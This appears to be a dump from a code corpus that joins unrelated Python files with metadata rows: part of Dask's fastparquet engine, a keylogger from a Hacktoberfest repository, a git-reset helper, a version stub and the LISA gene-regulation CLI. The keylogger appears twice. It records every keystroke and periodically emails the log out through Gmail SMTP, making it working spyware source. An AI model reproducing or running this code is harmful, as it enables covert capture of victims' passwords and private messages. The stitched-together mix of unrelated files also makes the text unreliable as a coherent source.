# Cannot allow `None` in columns if the user has specified index=False
index = dataset_info["index"]
if index is False and None in meta.columns:
meta.drop(columns=[None], inplace=True)
# Add `common_kwargs` to the first element of `parts`.
# We can return as a separate element in the future, but
# should avoid breaking the API for now.
if len(parts):
parts[0]["common_kwargs"] = common_kwargs
parts[0]["aggregation_depth"] = dataset_info["aggregation_depth"]
if len(parts) and len(parts[0]["piece"]) == 1:
# Strip all partition-dependent or unnecessary
# data from the `ParquetFile` object
pf = dataset_info["pf"]
pf.row_groups = None
pf.fmd.row_groups = None
pf._statistics = None
parts[0]["common_kwargs"]["parquet_file"] = pf
return (meta, stats, parts, index)
@classmethod
def multi_support(cls):
return cls == FastParquetEngine
@classmethod
def read_partition(
cls,
fs,
pieces,
columns,
index,
categories=(),
root_cats=None,
root_file_scheme=None,
base_path=None,
**kwargs,
):
null_index_name = False
base_path = False if not root_cats else base_path
if isinstance(index, list):
if index == [None]:
# Handling a None-labeled index...
# The pandas metadata told us to read in an index
# labeled `None`. If this corresponds to a `RangeIndex`,
# fastparquet will need use the pandas metadata to
# construct the index. Otherwise, the index will correspond
# to a column named "__index_level_0__". We will need to
# check the `ParquetFile` object for this column below.
index = []
null_index_name = True
columns += index
# Use global `parquet_file` object. Need to reattach
# the desired row_group
parquet_file = kwargs.pop("parquet_file", None)
# Always convert pieces to list
if not isinstance(pieces, list):
pieces = [pieces]
sample = pieces[0]
if isinstance(sample, tuple):
if isinstance(sample[0], str):
# We have paths to read from
assert parquet_file is None
row_groups = []
rg_offset = 0
parquet_file = ParquetFile(
[p[0] for p in pieces],
open_with=fs.open,
root=base_path or False,
**kwargs.get("dataset", {}),
)
for piece in pieces:
_pf = (
parquet_file
if len(pieces) == 1
else ParquetFile(
piece[0],
open_with=fs.open,
root=base_path or False,
**kwargs.get("dataset", {}),
)
)
n_local_row_groups = len(_pf.row_groups)
local_rg_indices = piece[1] or list(range(n_local_row_groups))
row_groups += [
parquet_file.row_groups[rg + rg_offset]
for rg in local_rg_indices
]
rg_offset += n_local_row_groups
update_parquet_file = len(row_groups) < len(parquet_file.row_groups)
elif parquet_file:
row_groups = []
for piece in pieces:
# `piece[1]` will contain actual row-group objects,
# but they may be pickled
rgs = piece[0]
if isinstance(rgs, bytes):
rgs = pickle.loads(rgs)
row_groups += rgs
update_parquet_file = True
else:
raise ValueError("Neither path nor ParquetFile detected!")
if update_parquet_file:
with _FP_FILE_LOCK:
for rg in row_groups:
for chunk in rg.columns:
s = chunk.file_path
if s and isinstance(s, bytes):
chunk.file_path = s.decode()
parquet_file.fmd.row_groups = row_groups
# NOTE: May lose cats after `_set_attrs` call
save_cats = parquet_file.cats
parquet_file._set_attrs()
parquet_file.cats = save_cats
if null_index_name:
if "__index_level_0__" in parquet_file.columns:
# See "Handling a None-labeled index" comment above
index = ["__index_level_0__"]
columns += index
# Update hive-partitioning information if necessary
parquet_file.cats = root_cats or {}
if root_cats:
parquet_file.file_scheme = root_file_scheme
parquet_file._dtypes = (
lambda *args: parquet_file.dtypes
) # ugly patch, could be fixed
# Convert ParquetFile to pandas
return cls.pf_to_pandas(
parquet_file,
fs=fs,
columns=columns,
categories=categories,
index=index,
**kwargs.get("read", {}),
)
else:
# `sample` is NOT a tuple
raise ValueError(f"Expected tuple, got {type(sample)}")
@classmethod
def pf_to_pandas(
cls,
pf,
fs=None,
columns=None,
categories=None,
index=None,
open_file_options=None,
**kwargs,
):
# This method was mostly copied from the fastparquet
# `ParquetFile.to_pandas` definition. We maintain our
# own implmentation in Dask to enable better remote
# file-handling control
# Handle selected columns
if columns is not None:
columns = columns[:]
else:
columns = pf.columns + list(pf.cats)
if index:
columns += [i for i in index if i not in columns]
# Extract row-groups and pre-allocate df
rgs = pf.row_groups
size = sum(rg.num_rows for rg in rgs)
df, views = pf.pre_allocate(size, columns, categories, index)
start = 0
# Get a map of file names -> row-groups
fn_rg_map = defaultdict(list)
for rg in rgs:
fn = pf.row_group_filename(rg)
fn_rg_map[fn].append(rg)
# Define file-opening options
precache_options, open_file_options = _process_open_file_options(
open_file_options,
**(
{
"allow_precache": False,
"default_cache": "readahead",
}
if _is_local_fs(fs)
else {
"metadata": pf,
"columns": list(set(columns).intersection(pf.columns)),
"row_groups": [rgs for rgs in fn_rg_map.values()],
"default_engine": "fastparquet",
"default_cache": "readahead",
}
),
)
with ExitStack() as stack:
for fn, infile in zip(
fn_rg_map.keys(),
_open_input_files(
list(fn_rg_map.keys()),
fs=fs,
context_stack=stack,
precache_options=precache_options,
**open_file_options,
),
):
for rg in fn_rg_map[fn]:
thislen = rg.num_rows
parts = {
name: (
v
if name.endswith("-catdef")
else v[start : start + thislen]
)
for (name, v) in views.items()
}
# Add row-group data to df
pf.read_row_group_file(
rg,
columns,
categories,
index,
assign=parts,
partition_meta=pf.partition_meta,
infile=infile,
**kwargs,
)
start += thislen
return df
@classmethod
def initialize_write(
cls,
df,
fs,
path,
append=False,
partition_on=None,
ignore_divisions=False,
division_info=None,
schema=None,
object_encoding="utf8",
index_cols=None,
custom_metadata=None,
**kwargs,
):
if index_cols is None:
index_cols = []
if append and division_info is None:
ignore_divisions = True
fs.mkdirs(path, exist_ok=True)
if object_encoding == "infer" or (
isinstance(object_encoding, dict) and "infer" in object_encoding.values()
):
raise ValueError(
'"infer" not allowed as object encoding, '
"because this required data in memory."
)
metadata_file_exists = False
if append:
try:
# to append to a dataset without _metadata, need to load
# _common_metadata or any data file here
pf = fastparquet.api.ParquetFile(path, open_with=fs.open)
metadata_file_exists = fs.exists(fs.sep.join([path, "_metadata"]))
except (OSError, ValueError):
# append for create
append = False
if append:
if pf.file_scheme not in ["hive", "empty", "flat"]:
raise ValueError(
"Requested file scheme is hive, but existing file scheme is not."
)
elif (set(pf.columns) != set(df.columns) - set(partition_on)) or (
set(partition_on) != set(pf.cats)
):
raise ValueError(
"Appended columns not the same.\n"
"Previous: {} | New: {}".format(pf.columns, list(df.columns))
)
elif (pd.Series(pf.dtypes).loc[pf.columns] != df[pf.columns].dtypes).any():
raise ValueError(
"Appended dtypes differ.\n{}".format(
set(pf.dtypes.items()) ^ set(df.dtypes.items())
)
)
else:
df = df[pf.columns + partition_on]
fmd = pf.fmd
i_offset = fastparquet.writer.find_max_part(fmd.row_groups)
if not ignore_divisions:
if not set(index_cols).intersection([division_info["name"]]):
ignore_divisions = True
if not ignore_divisions:
minmax = fastparquet.api.sorted_partitioned_columns(pf)
# If fastparquet detects that a partitioned column isn't sorted, it won't
# appear in the resulting min/max dictionary
old_end = (
minmax[index_cols[0]]["max"][-1]
if index_cols[0] in minmax
else None
)
divisions = division_info["divisions"]
if old_end is None or divisions[0] <= old_end:
raise ValueError(
"Appended divisions overlapping with previous ones."
"\n"
"Previous: {} | New: {}".format(old_end, divisions[0])
)
else:
fmd = fastparquet.writer.make_metadata(
df._meta,
object_encoding=object_encoding,
index_cols=index_cols,
ignore_columns=partition_on,
**kwargs,
)
i_offset = 0
if custom_metadata is not None:
kvm = fmd.key_value_metadata or []
kvm.extend(
[
fastparquet.parquet_thrift.KeyValue(key=key, value=value)
for key, value in custom_metadata.items()
]
)
fmd.key_value_metadata = kvm
extra_write_kwargs = {"fmd": fmd}
return i_offset, fmd, metadata_file_exists, extra_write_kwargs
@classmethod
def write_partition(
cls,
df,
path,
fs,
filename,
partition_on,
return_metadata,
fmd=None,
compression=None,
custom_metadata=None,
**kwargs,
):
# Update key/value metadata if necessary
fmd = copy.copy(fmd)
for s in fmd.schema:
if isinstance(s.name, bytes):
# can be coerced to bytes on copy
s.name = s.name.decode()
if custom_metadata and fmd is not None:
fmd.key_value_metadata = fmd.key_value_metadata + (
[
fastparquet.parquet_thrift.KeyValue(key=key, value=value)
for key, value in custom_metadata.items()
]
)
if not len(df):
# Write nothing for empty partitions
rgs = []
elif partition_on:
mkdirs = lambda x: fs.mkdirs(x, exist_ok=True)
if parse_version(fastparquet.__version__) >= parse_version("0.1.4"):
rgs = partition_on_columns(
df, partition_on, path, filename, fmd, compression, fs.open, mkdirs
)
else:
rgs = partition_on_columns(
df,
partition_on,
path,
filename,
fmd,
fs.sep,
compression,
fs.open,
mkdirs,
)
else:
with fs.open(fs.sep.join([path, filename]), "wb") as fil:
fmd.num_rows = len(df)
rg = make_part_file(
fil, df, fmd.schema, compression=compression, fmd=fmd
)
for chunk in rg.columns:
chunk.file_path = filename
rgs = [rg]
if return_metadata:
return rgs
else:
return []
@classmethod
def write_metadata(cls, parts, meta, fs, path, append=False, **kwargs):
_meta = copy.copy(meta)
rgs = meta.row_groups
if parts:
for rg in parts:
if rg is not None:
if isinstance(rg, list):
for r in rg:
rgs.append(r)
else:
rgs.append(rg)
_meta.row_groups = rgs
fn = fs.sep.join([path, "_metadata"])
fastparquet.writer.write_common_metadata(
fn, _meta, open_with=fs.open, no_row_groups=False
)
# if appending, could skip this, but would need to check existence
fn = fs.sep.join([path, "_common_metadata"])
fastparquet.writer.write_common_metadata(fn, _meta, open_with=fs.open)
| true | true |
f725f3882774f4a3c357d3b4d5807560a3f511c3 | 1,457 | py | Python | Projects/Keylogger/key.py | eshaananand/HACKTOBERFEST_2021 | e868968e104639307ae18c7cac842c4a092674fb | [
"MIT"
] | null | null | null | Projects/Keylogger/key.py | eshaananand/HACKTOBERFEST_2021 | e868968e104639307ae18c7cac842c4a092674fb | [
"MIT"
] | null | null | null | Projects/Keylogger/key.py | eshaananand/HACKTOBERFEST_2021 | e868968e104639307ae18c7cac842c4a092674fb | [
"MIT"
] | 9 | 2020-10-15T08:15:01.000Z | 2020-10-19T15:04:26.000Z | # -*- coding: utf-8 -*-
"""
Created on Fri Oct 18 00:20:49 2019
@author: Asus
"""
import pynput.keyboard
import threading
import smtplib
class Keylogger:
def __init__(self,time_interval ,email ,password):
self.log ="keylogger started"
self.interval = time_interval
self.email=email
self.password=password
def append_to_log(self,string):
self.log =self.log +string
def process_key_press(self,key):
try:
current_key=str(key.char)
except AttributeError:
if key== key.space:
current_key=" "
elif key == key.backspace :
current_key="*"
elif key == key.enter :
current_key="/"
else:
current_key=" " +str(key)+" "
self.append_to_log(current_key)
def report(self):
self.send_mail(self.email,self.password, "\n\n" + self.log)
self.log=""
timer=threading.Timer(self.interval,self.report)
timer.start()
def send_mail(self,email,password,message):
server=smtplib.SMTP("smtp.gmail.com",587)
server.starttls()
server.login(email,password)
server.sendmail(email,email,message)
server.quit()
def start(self):
keyboard_listener=pynput.keyboard.Listener(on_press=self.process_key_press)
with keyboard_listener:
self.report()
keyboard_listener.join() | 31 | 83 | 0.597804 |
import pynput.keyboard
import threading
import smtplib
class Keylogger:
def __init__(self,time_interval ,email ,password):
self.log ="keylogger started"
self.interval = time_interval
self.email=email
self.password=password
def append_to_log(self,string):
self.log =self.log +string
def process_key_press(self,key):
try:
current_key=str(key.char)
except AttributeError:
if key== key.space:
current_key=" "
elif key == key.backspace :
current_key="*"
elif key == key.enter :
current_key="/"
else:
current_key=" " +str(key)+" "
self.append_to_log(current_key)
def report(self):
self.send_mail(self.email,self.password, "\n\n" + self.log)
self.log=""
timer=threading.Timer(self.interval,self.report)
timer.start()
def send_mail(self,email,password,message):
server=smtplib.SMTP("smtp.gmail.com",587)
server.starttls()
server.login(email,password)
server.sendmail(email,email,message)
server.quit()
def start(self):
keyboard_listener=pynput.keyboard.Listener(on_press=self.process_key_press)
with keyboard_listener:
self.report()
keyboard_listener.join() | true | true |
f725f3d9875d4e6eb82a0011123cb41d1bfeac57 | 149 | py | Python | stograde/student/reset.py | babatana/stograde | c1c447e99c44c23cef9dd857e669861f3708ae77 | [
"MIT"
] | 7 | 2016-08-05T00:41:11.000Z | 2019-08-22T11:12:10.000Z | stograde/student/reset.py | babatana/stograde | c1c447e99c44c23cef9dd857e669861f3708ae77 | [
"MIT"
] | 145 | 2016-08-04T01:07:11.000Z | 2019-09-09T22:07:13.000Z | stograde/student/reset.py | babatana/stograde | c1c447e99c44c23cef9dd857e669861f3708ae77 | [
"MIT"
] | 3 | 2017-02-06T21:52:46.000Z | 2019-02-18T10:35:01.000Z | from ..common import chdir, run
def reset(student: str):
with chdir(student):
run(['git', 'checkout', 'master', '--quiet', '--force'])
| 21.285714 | 64 | 0.590604 | from ..common import chdir, run
def reset(student: str):
with chdir(student):
run(['git', 'checkout', 'master', '--quiet', '--force'])
| true | true |
f725f4ccae39d255e7f8a1319af3c13ec1833d91 | 71 | py | Python | nca47/version.py | WosunOO/nca_xianshu | bbb548cb67b755a57528796d4c5a66ee68df2678 | [
"Apache-2.0"
] | null | null | null | nca47/version.py | WosunOO/nca_xianshu | bbb548cb67b755a57528796d4c5a66ee68df2678 | [
"Apache-2.0"
] | null | null | null | nca47/version.py | WosunOO/nca_xianshu | bbb548cb67b755a57528796d4c5a66ee68df2678 | [
"Apache-2.0"
] | null | null | null | import pbr.version
version_info = pbr.version.VersionInfo('nca47')
| 17.75 | 48 | 0.760563 | import pbr.version
version_info = pbr.version.VersionInfo('nca47')
| true | true |
f725f4dae2e4c5953b2e2ca2570972ac74936c24 | 22,958 | py | Python | lisa/cli/cli.py | Wang-Cankun/lisa2 | 2407cc3c12f43bf41f0e14b2a8a5fcdfe07ff310 | [
"MIT"
] | 17 | 2020-09-21T20:04:43.000Z | 2022-01-15T11:25:41.000Z | lisa/cli/cli.py | Wang-Cankun/lisa2 | 2407cc3c12f43bf41f0e14b2a8a5fcdfe07ff310 | [
"MIT"
] | 1 | 2021-10-04T22:39:05.000Z | 2021-10-04T22:39:05.000Z | lisa/cli/cli.py | Wang-Cankun/lisa2 | 2407cc3c12f43bf41f0e14b2a8a5fcdfe07ff310 | [
"MIT"
] | 5 | 2021-02-16T13:16:34.000Z | 2022-03-08T16:15:25.000Z | '''
********
Lisa CLI
********
Installing LISA using pip or conda adds the "lisa" command to your path. LISA's functionality is divided into three main subcommands:
* `lisa oneshot`_ : one genelist
* `lisa multi`_ : multiple genelists
* `lisa regions`_ : one genelist and a list of regions
Which are used depending on the evidence you have on hand.
See the `User Guide <user_guide.rst>`_ for more usage information.
See the `Python API <python_api.rst>`_ for more in-depth description of tests and parameters.
'''
from lisa import FromRegions, FromGenes, FromCoverage
from lisa.core.utils import Log
from lisa.core.lisa_core import DownloadRequiredError
from lisa.core.data_interface import DatasetNotFoundError, INSTALL_PATH
from lisa._version import __version__
import configparser
import argparse
import os
import sys
import json
from collections import defaultdict
from shutil import copyfile
import lisa.cli.test_cli as tests
from shutil import copyfile
import numpy as np
from lisa.lisa_public_data.genes_test import _config as public_config
from lisa.lisa_user_data.regions_test import _config as user_config
from lisa.core.io import parse_deseq_file
#____COMMAND LINE INTERFACE________
INSTANTIATION_KWARGS = ['isd_method','verbose','assays', 'rp_map']
PREDICTION_KWARGS = ['background_list','num_background_genes','background_strategy', 'seed']
def extract_kwargs(args, keywords):
return {key : vars(args)[key] for key in keywords}
def is_valid_prefix(prefix):
if '/' in prefix:
if os.path.isdir(prefix) or os.path.isfile(prefix) or os.path.isdir(os.path.dirname(prefix)):
return prefix
else:
raise argparse.ArgumentTypeError('{}: Invalid file prefix.'.format(prefix))
else:
return prefix
def save_results(args, results, metadata):
if args.save_metadata:
if args.output_prefix:
metadata_filename = args.output_prefix + '.metadata.json'
else:
metadata_filename = os.path.basename(args.query_list.name) + '.metadata.json'
with open(metadata_filename, 'w') as f:
f.write(json.dumps(metadata, indent=4))
if not args.output_prefix is None:
with open(args.output_prefix + '.lisa.tsv', 'w') as f:
f.write(results.to_tsv())
else:
print(results.to_tsv())
def lisa_oneshot(args):
try:
args.background_list = args.background_list.readlines()
except AttributeError:
pass
results, metadata = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS)).predict(args.query_list.readlines(), **extract_kwargs(args, PREDICTION_KWARGS))
save_results(args, results, metadata)
def lisa_regions(args):
try:
args.background_list = args.background_list.readlines()
except AttributeError:
pass
if not args.macs_xls:
fn = FromRegions.using_bedfile
else:
fn = FromRegions.using_macs_output
results, metadata = fn(args.species, args.query_genes, args.regions, rp_map = args.rp_map,
rp_decay=args.rp_decay, isd_method=args.isd_method, background_list=args.background_list,
background_strategy=args.background_strategy, num_background_genes = args.num_background_genes,
seed=args.seed, header = args.header)
save_results(args, results, metadata)
def lisa_coverage(args):
try:
args.background_list = args.background_list.readlines()
except AttributeError:
pass
results, metadata = FromCoverage.using_bigwig(args.species, args.query_genes, args.bigwig_path, rp_map = args.rp_map,
isd_method=args.isd_method, background_list=args.background_list,
background_strategy=args.background_strategy, num_background_genes = args.num_background_genes,
seed=args.seed)
save_results(args, results, metadata)
def save_and_get_top_TFs(args, query_name, results, metadata):
with open(args.output_prefix + query_name + '.lisa.tsv', 'w') as f:
f.write(results.to_tsv())
if args.save_metadata:
with open(args.output_prefix + query_name + '.metadata.json', 'w') as f:
f.write(json.dumps(metadata, indent=4))
top_TFs = results.to_dict()['factor']
return list(set(top_TFs[:10]))
def print_results_multi(results_summary):
print('Sample\tTop Regulatory Factors:')
for result_line in results_summary:
print(result_line[0], ', '.join(result_line[1]), sep = '\t')
class MultiError(Exception):
pass
def lisa_multi(args):
log = Log(target = sys.stderr, verbose = args.verbose)
lisa = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS), log = log)
query_dict = {os.path.basename(query.name) : query.readlines() for query in args.query_lists}
results_summary = []
all_passed = True
for query_name, query_list in query_dict.items():
with log.section('Modeling {}:'.format(str(query_name))):
try:
results, metadata = lisa.predict(query_list, **extract_kwargs(args, PREDICTION_KWARGS))
top_TFs_unique = save_and_get_top_TFs(args, query_name, results, metadata)
results_summary.append((query_name, top_TFs_unique))
except AssertionError as err:
all_passed = False
log.append('ERROR: ' + str(err))
print_results_multi(results_summary)
if not all_passed:
raise MultiError('One or more genelists raised an error')
def lisa_deseq(args):
log = Log(target = sys.stderr, verbose = args.verbose)
lisa = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS), log = log)
up_genes, down_genes = parse_deseq_file(args.deseq_file, lfc_cutoff = args.lfc_cutoff,
pval_cutoff= args.pval_cutoff, sep = args.sep)
results_summary = []
all_passed = True
for prefix, query_list in zip(['up-regulated', 'down-regulated'], [up_genes, down_genes]):
with log.section('Modeling {}:'.format(str(prefix))):
try:
results, metadata = lisa.predict(query_list, **extract_kwargs(args, PREDICTION_KWARGS))
top_TFs_unique = save_and_get_top_TFs(args, prefix, results, metadata)
results_summary.append((prefix, top_TFs_unique))
except AssertionError as err:
all_passed = False
log.append('ERROR: ' + str(err))
print_results_multi(results_summary)
if not all_passed:
raise MultiError('One or more genelists raised an error')
def confirm_file(arg):
if os.path.isfile(arg):
return arg
else:
raise argparse.ArgumentTypeError('ERROR: {} is not a valid file'.format(str(arg)))
def run_tests(args):
if not args.skip_oneshot:
tests.test_oneshot(args.test_genelist, args.background_genelist)
tests.test_multi(args.genelists)
def build_common_args(parser):
parser.add_argument('--seed', type = int, default = 2556, help = 'Random seed for gene selection. Allows for reproducing exact results.')
parser.add_argument('--use_motifs', action = 'store_const', const = 'motifs', default='chipseq',
dest = 'isd_method', help = 'Use motif hits instead of ChIP-seq peaks to represent TF binding (only recommended if TF-of-interest is not represented in ChIP-seq database).')
parser.add_argument('--save_metadata', action = 'store_true', default = False, help = 'Save json-formatted metadata from processing each gene list.')
def build_from_genes_args(parser, add_assays = True):
#parser.add_argument('-c','--cores', required = True, type = int)
if add_assays:
parser.add_argument('-a','--assays',nargs='+',default=['Direct','H3K27ac','DNase'], choices=['Direct','H3K27ac','DNase'], help = 'Which set of insilico-deletion assays to run.')
parser.add_argument('--rp_map_style', dest = 'rp_map', choices=public_config.get('lisa_params','rp_map_styles').split(','),
default= public_config.get('lisa_params','rp_map_styles').split(',')[0], help = 'Which style of rp_map to assess influence of regions on genes. "basic" is stricly distance-based, while "enhanced" masks the exon and promoter regions of nearby genes.')
def build_multiple_lists_args(parser):
parser.add_argument('-o','--output_prefix', required = True, type = is_valid_prefix, help = 'Output file prefix.')
parser.add_argument('-v','--verbose',type = int, default = 2)
parser.add_argument('-b','--num_background_genes', type = int, default = public_config.get('lisa_params', 'background_genes'),
help = 'Number of sampled background genes to compare to user-supplied genes. These genes are selection from other gene lists.')
parser.add_argument('--random_background', action = 'store_const', const = 'random', default = 'regulatory', dest = 'background_strategy', help = 'Use random background selection rather than "regulatory" selection.')
def build_one_list_args(parser, default_background_strategy = 'regulatory'):
parser.add_argument('-o','--output_prefix', required = False, type = is_valid_prefix, help = 'Output file prefix. If left empty, will write results to stdout.')
parser.add_argument('--background_strategy', choices = public_config.get('lisa_params', 'background_strategies').split(','),
default = default_background_strategy,
help = """Background genes selection strategy. LISA samples background genes to compare to user\'s genes-of-interest from a diverse
regulatory background (regulatory - recommended), randomly from all genes (random), or uses a user-provided list (provided).
""")
background_genes_group = parser.add_mutually_exclusive_group()
background_genes_group.add_argument('--background_list', type = argparse.FileType('r', encoding = 'utf-8'), required = False,
help = 'user-supplied list of backgroung genes. Used when --background_strategy flag is set to "provided"')
background_genes_group.add_argument('-b','--num_background_genes', type = int, default = public_config.get('lisa_params', 'background_genes'),
help = 'Number of sampled background genes to compare to user-supplied genes')
parser.add_argument('-v','--verbose',type = int, default = 4)
def build_deseq_args(parser):
parser.add_argument('deseq_file', type = confirm_file, help = 'DEseq differential expression output file. Will be parsed for differentially up and down-regulated genes.')
parser.add_argument('-lfc','--lfc_cutoff', type = float, default = 1, help = 'Log2 fold-change cutoff. For up-regulated genes, must have LFC > cutoff. For down-regulated genes, less than -1 * cutoff. Default of 1 means genes must be up or down-regulated by a factor of 2 to be included in query.')
parser.add_argument('-p','--pval_cutoff', type = float, default = 0.1, help = 'Adjusted p-value cutoff. Gene must have pval below cutoff to be a query gene.')
parser.add_argument('--sep', type = str, default='\t', help = 'Field separator for DESeq output file.')
class RstFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawTextHelpFormatter):
pass
parser = argparse.ArgumentParser(
formatter_class=RstFormatter,
description =
"""
Lisa: inferring transcriptional regulators through integrative modeling of public chromatin accessibility and ChIP-seq data
https://genomebiology.biomedcentral.com/articles/10.1186/s13059-020-1934-6
X. Shirley Liu Lab, 2020
""")
parser.add_argument('--version', action = 'version', version = __version__)
subparsers = parser.add_subparsers(help = 'commands')
#__ LISA oneshot command __
oneshot_parser = subparsers.add_parser('oneshot', formatter_class=RstFormatter, description = '''
lisa oneshot
------------
You have:
* one genelist
Use LISA to infer influential TFs from one gene list, with background epigenetic landscape modeled using public data.
If you have multiple lists, this option will be slower than using "multi" due to data-loading time. \n
Example::
$ lisa oneshot hg38 ./genelist.txt -b 501 --seed=2556 --save_metadata > results.tsv
''')
oneshot_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
oneshot_parser.add_argument('query_list', type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene lists. One gene per line in either symbol or refseqID format')
build_one_list_args(oneshot_parser)
build_from_genes_args(oneshot_parser)
build_common_args(oneshot_parser)
oneshot_parser.set_defaults(func = lisa_oneshot)
deseq_parser = subparsers.add_parser('deseq', formatter_class = RstFormatter, description = '''
lisa deseq
----------
You have:
* RNA-seq differential expression results from DESeq2
Use LISA to infer influential TFs given differentially expressed genes found using DESeq2. Will seperate up-regulated and down-regulated genes into their own LISA tests.
Example::
$ lisa deseq hg38 ./deseq_results.tsv -o deseq/ -b 501 --seed=2556 --save_metadata
''')
deseq_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
build_deseq_args(deseq_parser)
build_multiple_lists_args(deseq_parser)
build_from_genes_args(deseq_parser)
build_common_args(deseq_parser)
deseq_parser.set_defaults(func = lisa_deseq, background_list = None)
#__ LISA multi command __
multi_parser = subparsers.add_parser('multi', formatter_class=RstFormatter, description = '''
lisa multi
----------
You have:
* multiple genelists
Use LISA to infer influential TFs from multiple lists. This function processes each genelist independently in the same manner as the "oneshot" command, but reduces data loading time. Useful when performing
the test on up and down-regulated genes from multiple RNA-seq clusters.
Example::
$ lisa multi hg38 ./genelists/*.txt -b 501 -o ./results/
''')
multi_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
multi_parser.add_argument('query_lists', type = argparse.FileType('r', encoding = 'utf-8'), nargs = "+", help = 'user-supplied gene lists. One gene per line in either symbol or refseqID format')
build_multiple_lists_args(multi_parser)
build_from_genes_args(multi_parser)
build_common_args(multi_parser)
multi_parser.set_defaults(func = lisa_multi, background_list = None)
from argparse import SUPPRESS
#____ LISA regions command ____
regions_parser = subparsers.add_parser('regions', formatter_class=RstFormatter, add_help = False, description = '''
lisa regions
------------
You have:
* one genelist
* regions (250 - 1000 bp wide) of interest related to that list
* optional: a positive score/weight associated with each region (you may pass zero-weight regions, but they do not affect the test and will be filtered out)
Use LISA to infer TF influence on your geneset, but provide your regions-of-interest rather than building a background epigenetic model using public data. When providing
your own regions, LISA uses higher resolution, more precise binding data to increase the power of the test. Your regions should be between ~250 and 1000 bp in width, and the
associated score should be positive. Scores are often read-depth at those regions, but can be any metic you think may influence gene regulation.
Example::
$ lisa regions -r ./regions.bed -q ./genelist.txt --save_metadata > results.tsv
$ lisa regions -r ./macs_peaks.xls -q ./genelist.txt --macs_xls > results.tsv
''')
regions_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
regions_required = regions_parser.add_argument_group('required arguments')
regions_required.add_argument('-q', '--query_genes', required = True, type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene list. One gene per line in either symbol or refseqID format')
regions_required.add_argument('-r', '--regions', type = confirm_file, required = True, help = 'Tad-delineated bed file with columns: chr, start, end[, score]. The score column is optional. If not provided, LISA will assign each region a uniform weight.')
regions_optional = regions_parser.add_argument_group('optional arguments')
regions_optional.add_argument('--header', action = 'store_true', default=False, help = 'Bed file has header row as first row. The header row may contain ')
regions_optional.add_argument('--macs_xls', action = 'store_true', default=False, help='If provided, regions file is a MACS2 .xls output file, and the "pileup" field is taken to be the region score.')
regions_optional.add_argument('--rp_map_style', dest = 'rp_map', choices=user_config.get('lisa_params','rp_map_styles').split(','),
default=user_config.get('lisa_params','rp_map_styles').split(',')[0])
regions_optional.add_argument('--rp_decay', type = int, default = user_config.get('lisa_params','rp_decay'),
help = 'Distance in base-pairs in which the influence of a region on a gene decays by half. Increase for more weight on distal elements, decrease for more weight on promoter elements.')
build_one_list_args(regions_optional, default_background_strategy='all')
build_common_args(regions_optional)
regions_optional.add_argument('-h', '--help', action = 'help', default=SUPPRESS)
regions_parser.set_defaults(func = lisa_regions)
#___ LISA coverage commands _____
coverage_parser = subparsers.add_parser('coverage', formatter_class = RstFormatter, add_help = False, description = '''
lisa coverage
------------
You have:
* one genelist
* bigwig of coverage over the genome
Use LISA to infer TF influence on your geneset using your own coverage data. This test is better suited than the "regions" test when your measure produces wide peaks/areas of influence.
An example of this is H3K27ac data, which correlates with gene expression similarly to accessibility, but produces wide peaks that may span many distinct TF binding locations.
Example::
$ lisa coverage -bw ./sample.bigwig -q ./genelist.txt --save_metadata > results.tsv
''')
coverage_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
coverage_parser.add_argument('-q', '--query_genes', required = True, type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene list. One gene per line in either symbol or refseqID format')
coverage_parser.add_argument('-bw', '--bigwig_path', type = confirm_file, required = True, help = 'Bigwig file describing coverage over the genome.')
coverage_optional = coverage_parser.add_argument_group('optional arguments')
build_from_genes_args(coverage_optional, False)
build_one_list_args(coverage_optional, default_background_strategy='all')
build_common_args(coverage_optional)
coverage_optional.add_argument('-h', '--help', action = 'help', default=SUPPRESS)
coverage_parser.set_defaults(func = lisa_coverage)
#__ download command ___
def lisa_download(args):
if args.command in ['oneshot','multi','coverage']:
_class = FromGenes
elif args.command == 'regions':
_class = FromRegions
else:
raise AssertionError('Command {} not recognized'.format(args.command))
if args.url:
print(_class.get_dataset_url(args.species))
else:
_class.download_dataset(args.species)
download_data_parser = subparsers.add_parser('download', description = 'Download data from CistromeDB. Use if data recieved is incomplete or malformed.')
download_data_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Download data associated with human (hg38) or mouse (mm10) genes')
download_data_parser.add_argument('command', choices=['oneshot', 'multi', 'regions', 'coverage'], help = 'For which command to download data')
download_data_parser.add_argument('--url', action = 'store_true', help = 'Get url for data download. Does not install data.')
download_data_parser.set_defaults(func = lisa_download)
#__ install command ___
def install_data(args):
if args.command in ['oneshot','multi','coverage']:
_class = FromGenes
elif args.command == 'regions':
_class = FromRegions
else:
raise AssertionError('Command {} not recognized'.format(args.command))
dataset_file_required = os.path.basename(_class.get_dataset_path(args.species))
if not args.force:
assert(dataset_file_required == os.path.basename(args.dataset)), 'The {} test requires dataset {}. Use --force to overide and install your own dataset.'.format(args.command, dataset_file_required)
if not os.path.isdir(INSTALL_PATH):
os.mkdir(INSTALL_PATH)
if args.remove:
os.rename(args.dataset, _class.get_dataset_path(args.species))
else:
copyfile(args.dataset, _class.get_dataset_path(args.species))
install_data_parser = subparsers.add_parser('install', description = 'Helper command for manually installing Lisa\'s data')
install_data_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Install data associated with human (hg38) or mouse (mm10) genes')
install_data_parser.add_argument('command', choices=['oneshot', 'multi', 'regions', 'coverage'], help = 'For which command to install data')
install_data_parser.add_argument('dataset', type = confirm_file, help = 'Path to downloaded h5 dataset')
install_data_parser.add_argument('--remove', action = 'store_true', help = 'Delete dataset after installation is complete.')
install_data_parser.add_argument('--force', action = 'store_true', help = 'Skip namecheck and install lisa custom dataset')
